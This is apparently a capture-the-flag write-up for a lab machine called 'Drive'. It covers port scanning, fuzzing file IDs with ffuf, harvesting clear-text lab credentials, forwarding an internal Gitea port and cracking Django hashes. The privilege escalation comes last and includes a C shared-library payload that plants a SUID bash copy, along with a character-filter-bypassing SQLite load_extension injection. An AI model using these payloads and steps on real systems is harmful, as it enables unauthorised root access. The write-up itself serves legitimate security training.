Week 3. Drive

TL;DR

This is an Ubuntu 20.04 host running a custom web app called doodleGrive which is used to share and edit files. A clear text password is uploaded into the tool which can be used to get an initial foothold. An internal Gitea server, used for config control, also contains clear text password which allows accessing database backups. For privilege escalation, reversing in a local binary and SQLite injection are needed. To get code execution, the SQLite load_extensions() function is used.

KEYWORDS

Gitea, port forwarding, reversing, Ghidra, C, SQLite injection.

REFERENCES

https://hashcat.net/wiki/doku.php?id=example_hashes

https://www.sqlite.org/loadext.html

https://www.w3resource.com/sqlite/core-functions-char.php

https://www.sqlite.org/loadext.html

ENUMERATION

Port scan.

> nmap $target -p- -T4 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-14 15:20 EDT
Nmap scan report for 10.129.236.186
Host is up, received user-set (0.35s latency).
Not shown: 33294 filtered tcp ports (no-response), 32239 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack
 
Nmap done: 1 IP address (1 host up) scanned in 194.37 seconds

Enumerate the open ports

> nmap $target -p22,80 -sV -sC -Pn -vv   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-14 15:24 EDT
 
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 275a9fdb91c316e57da60d6dcb6bbd4a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCyyCDYN041kanjaSvUxqW5SenLxm0d0OeKT63VFnPxosvShWWbaEg96sDQ96DjFBFwPUco6uWREVp/Iqbr4pU+CyuzuGgvyHSkluruW386eCUwHyigizK98wPLpZWDc50xXJjUV+lSbczNrO8K4IgFgB6PxoXrw3nl9/lsJEH2dlZn/cwD78CO5/lrx4EowSky2dFPjpIGhM6bWHe1iKugD9Jlyq66f5Cw3B1Kszr5HgdiMCYpw3ykfpeRbcNL0pWn1AN9KeBkIJGNpzJ9RPj1YB0s5i9LPdcq64gyhrCmcfl3yYukq4R5OLuHRbbnc7TZHT3zHSkx9uln0QDDEL7CGGZbtRpPj2D++jjDuIK/mtaWGerjgHonX0RA/IPACyEYv01C6J5hjpuQGqJvbldtz9wOS7hJUgYx/MH2n2N8r0pSOIYQL7KxkFZ72w7WiQGktRt+Jzj5QvAXhbtXpkY9rhib7DL1lLMv5VBE5YAwuwQutbSUYAtZKSG57xwVPhU=
|   256 9d076bc847280df29f81f2b8c3a67853 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCnF1ZLcx/U/Eo2AMywmmrEXFf3MKF6k2oelVjHswAvYtAqk0Nbv8SCQF9gpR/EkDvoSF0bBIoovBnk2bHDT6SI=
|   256 1d30349f797369bdf667f3343c1ff94e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPJ60hQRxnk2iSpqzRQ4g/dd6SQFrOXnu/gN0SU2f4U/
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://drive.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 
Nmap done: 1 IP address (1 host up) scanned in 12.32 seconds

Enumerate the site with Firefox. Register a new account, and spend some time understanding what its functionality is. You can upload files, reserve them, edit them, assign to teams, etc. Note that when a file is uploaded, a 3-digit folder is created (e.g. http://drive.htb/122/getFileDetail).

Also note that when reserving a file, the same 3-digit folder is used (e.g. http://drive.htb/122/block).

Let's list all blocked files fuzzing the 3-digit field. For this, first capture a block file request with Burpsuite, then right-click + copy and paste in a file called request.txt

In bash, edit the request.txt file to prepare it for ffuf. Edit with vim the 3-digit field we want to fuzz and save the field as request.txt

Prepare a wordlist with 200 items and launch ffuf using the request.txt file. Several documents are found.

> seq 1 200 > fuzz
 
> ffuf -c -request request.txt -request-proto http -t 100 -w ./fuzz
101                     [Status: 200, Size: 1927, Words: 3, Lines: 4]
115                     [Status: 200, Size: 2167, Words: 7, Lines: 12]
121                     [Status: 200, Size: 1952, Words: 6, Lines: 8]
122                     [Status: 200, Size: 3338, Words: 12, Lines: 19]
123                     [Status: 200, Size: 3302, Words: 15, Lines: 19]
99                      [Status: 200, Size: 1734, Words: 5, Lines: 8]
98                      [Status: 200, Size: 1718, Words: 8, Lines: 10]
100                     [Status: 200, Size: 1746, Words: 6, Lines: 5]
79                      [Status: 200, Size: 1923, Words: 5, Lines: 13]
:: Progress: [200/200] :: Job [1/1] :: 11 req/sec :: Duration: [0:00:15] :: Errors: 0 ::

Just browse the sites to find credentials for user martin: Xk4@KjyrYv8t194L!

Also, info related to the database is disclosed. Apparently, there is a scheduled daily backup plan where database is compressed and copied to /var/www/backups/. Backup will be protected with strong password.

Finally, enumerating the site we can also find a list of potential usernames (creating a group and then clicking on edit group).

admin
jamesMason
martinCruz
tomHands
crisDisel

We will use this user list later.

USER

Just use Martin's credentials to AAH in. First task is to enumerate system users. We see root is uid=0, git is uid=115, martin is uid=1001, cris is uid=1002 and tom is uid=1003

Scanning processes with pspy64, we find a Gitea web server running under the context of user git uid=115. This service was not discovered with nmap, so maybe it is an internal service.

In fact the web server is running internally on port 3000.

Let's forward port 3000 to our machine.

> ssh -f -N -L 3000:127.0.0.1:3000 martin@drive.htb

Now we can browse the Gitea server on http://localhost:3000, where martin's credentials are accepted. For this tool martin's username is martinCruz, as we found out previously.

In the DoodleGrive repository there is the database encryption script db_backup.sh, and the key they used to compress the 7z files. The password is H@ckThisP@ssW0rDIfY0uC@n:)

To unzip the files, first copy the files to Kali using scp, then unzip using the password.

> scp martin@drive.htb:/var/www/backups/1_Sep_db_backup.sqlite3.7z ~/htb/drive
martin@drive.htb's password:
1_Sep_db_backup.sqlite3.7z                                           100%   12KB  13.9KB/s   00:00
 
> 7z e -p 'H@ckThisP@ssW0rDIfY0uC@n:)' 1_Sep_db_backup.sqlite3.7z

Connect to the databases extracted using the sqlite3 command, and once inside the database, find a table called accounts_customuser. Dump the table to get some Django SHA-1 hashes.

> sqlite db.sqlite3
 
> .tables
 
> select * from accounts_customuser;

To crack these hashes use Hashcat module 124.

Testing the cracked passwords, we find out the credentials working for the user tom are tom:johnmayer7. Login using SSH and get the user flag.

SYSTEM

Enumerate the system.

> uname -a
Linux drive 5.4.0-164-generic #181-Ubuntu SMP Fri Sep 1 13:41:22 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 
> cat /etc/os-release
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"

Inside Tom's home folder, there is a binary called doodleGrive-cli with SUID permissions. It seems it needs credentials to execute.

In order to get to know how the binary works, the best is to reverse engineer the binary with Ghidra. Open the application, add the binaries and let the tool analyze the source code. Turns out the application is written in C, and inspecting the main() function we find out the credentials to run the binary are hardcoded in the source code.

The credentials to run the binary are moriarty:findMeIfY0uC@nMr.Holmz!

Navigating to the main_menu() function we find the calls to the functions presented in the menu. The most interesting is the function called activate_user_account()

Navigating to the function activate_user_account() we find out several interesting things. First, we discover the app only reads the first 40 (0x28) characters from user's input. Secondly, application sanitizes the user input (function sanitize_string()). Finally, we can see the SQLite SQL request used to update the database with the user's input.

UPDATE accounts_customuser SET is_active=1 WHERE username=\"%s\";

The %s represents the user's input parameter, note that the backslashes \ are just to escape the quotes. So in theory we could inject a SQL statement as long as starts with quotes and finishes with comment dashes.

" <sqlite statement here>;--

But first we have to inspect the sanitization function to check what we can enter and what not.

We see the function removes several characters and replaces them with a null character \0. The forbidden characters include \/{|' along with spaces and null chars. Good news are dashes and quotes are not filtered.

The next goal is to investigate how to gain command execution using SQLite statements. This can be done using load_extensions() functions. Basically, this feature allows to load C code compiled as a .so shared library. In the link https://www.sqlite.org/loadext.html you can find instructions to compile the source code.

First step is to generate a C payload load extension called le.c

# include <stdio.h>
# include <stdlib.h>
 
static void inject() __attribute__((constructor));
 
void inject() {
     system("/usr/bin/cp /bin/bash /var/tmp/bs && /usr/bin/chmod 4777 /var/tmp/bs");
}

Next, compile following SQLite documentation.

> gcc -g -shared -fPIC ./le.c -o ./le.so

Now we have to create an SQL injection to load the extension but keeping in mind the 40-char limitation and the forbidden characters. The final payload could be something like this.

" load_extensions(./le.so);--

However, this won't work because it contains forbidden chars. This can be bypassed using the sqlite3 function char() which translates characters from ASCII code (https://www.w3resource.com/sqlite/core-functions-char.php).

After doing some tests with an ASCII table and wc -c to fine tune the payload, we find a workable injection.

"+load_extension(char(46,47,108,101))--

Final steps are injecting the payload in the tool.

And checking that everything went well.

You are root.